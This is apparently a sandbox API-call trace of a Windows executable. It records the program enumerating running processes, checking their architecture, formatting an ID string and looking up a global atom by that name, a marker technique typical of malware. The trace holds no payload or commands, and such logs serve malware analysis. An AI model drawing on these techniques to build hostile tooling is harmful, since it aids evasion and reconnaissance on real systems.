	[0071.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.617] CloseHandle (hObject=0x224) returned 1
	[0071.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0071.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.618] CloseHandle (hObject=0x224) returned 1
	[0071.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0071.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.618] CloseHandle (hObject=0x224) returned 1
	[0071.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0071.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.618] CloseHandle (hObject=0x224) returned 1
	[0071.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e770, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0071.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0071.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.618] CloseHandle (hObject=0x224) returned 1
	[0071.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0071.619] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.619] CloseHandle (hObject=0x224) returned 1
	[0071.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0071.619] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.619] CloseHandle (hObject=0x224) returned 1
	[0071.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0071.619] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.619] CloseHandle (hObject=0x224) returned 1
	[0071.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0071.619] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.619] CloseHandle (hObject=0x224) returned 1
	[0071.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0071.619] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.619] CloseHandle (hObject=0x224) returned 1
	[0071.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0071.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0071.620] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.620] CloseHandle (hObject=0x224) returned 1
	[0071.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e888, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0071.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.620] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.620] CloseHandle (hObject=0x224) returned 1
	[0071.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.620] GetLastError () returned 0x5
	[0071.621] GetLastError () returned 0x5
	[0071.621] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.622] GetLastError () returned 0x5
	[0071.623] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.623] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0071.623] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.623] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.624] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetLastError () returned 0x5
	[0071.625] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.625] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0071.625] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.625] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0071.625] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0071.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0071.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0071.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.626] CloseHandle (hObject=0x224) returned 1
	[0071.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e680, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0071.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0071.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0071.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.626] CloseHandle (hObject=0x224) returned 1
	[0071.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16b38) returned 0xc0000004
	[0071.750] VirtualAlloc (lpAddress=0x0, dwSize=0x16c38, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0071.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16c38, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0071.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0071.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772158, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0071.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0071.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0071.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0071.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0071.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0071.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0071.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0071.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0071.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0071.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0071.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0071.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0071.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0071.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0071.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0071.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0071.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0071.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0071.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.756] CloseHandle (hObject=0x224) returned 1
	[0071.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0071.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0071.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0071.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.757] CloseHandle (hObject=0x224) returned 1
	[0071.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0071.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0071.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0071.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.757] CloseHandle (hObject=0x224) returned 1
	[0071.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0071.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.757] CloseHandle (hObject=0x224) returned 1
	[0071.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0071.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.758] CloseHandle (hObject=0x224) returned 1
